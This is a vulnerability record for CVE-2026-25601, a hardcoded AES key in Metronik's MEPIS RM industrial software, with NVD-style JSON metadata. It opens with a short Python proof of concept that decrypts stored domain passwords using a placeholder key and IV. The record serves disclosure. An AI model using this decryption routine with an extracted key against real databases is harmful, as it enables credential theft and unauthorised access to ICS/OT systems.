CVE-2026-25601

# Python PoC to demonstrate decryption logic (Simulation) # Note: The actual key needs to be extracted from Mx.Web.ComponentModel.dll from Crypto.Cipher import AES import base64 # Hardcoded key extracted from the vulnerable component HARDCODED_KEY = b'YOUR_EXTRACTED_KEY_HERE_16B' # Example 16-byte key IV = b'INIT_VECTOR_16BT' def decrypt_password(encrypted_password): """ Decrypts the password using the hardcoded key found in the DLL. """ try: cipher = AES.new(HARDCODED_KEY, AES.MODE_CBC, IV) decrypted_bytes = cipher.decrypt(base64.b64decode(encrypted_password)) # Remove padding (unpadding) pad = decrypted_bytes[-1] return decrypted_bytes[:-pad].decode('utf-8') except Exception as e: return f"Error: {e}" # Example usage: # encrypted_pw_from_db = "..." # print(decrypt_password(encrypted_pw_from_db))

{"cve": {"id": "CVE-2026-25601", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-04-01T12:16:02.587", "lastModified": "2026-04-07T20:47:29.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in MEPIS RM, an industrial\nsoftware product developed by Metronik. The application contained a hardcoded\ncryptographic key within the Mx.Web.ComponentModel.dll component. When the\noption to store domain passwords was enabled, this key was used to encrypt user\npasswords before storing them in the application’s database. An attacker with\nsufficient privileges to access the database could extract the encrypted\npasswords, decrypt them using the embedded key, and gain unauthorized access to\nthe associated ICS/OT environment."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metronik:mepis_rm:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.2.017", "matchCriteriaId": "F1D97A10-22CB-4C9C-8581-433F771F6958"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metronik:mepis_rm:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.2.0007", "matchCriteriaId": "641D46CD-B882-4EE3-B5FD-52ED712EF323"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metronik:mepis_rm:8.2.0007:-:*:*:*:*:*:*", "matchCriteriaId": "98B6B64E-528D-47F0-B6F8-8FF5859144C0"}]}]}], "references": [{"url": "https://www.cert.si/en/cve-2026-25601/", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "tags": ["Broken Link"]}]}}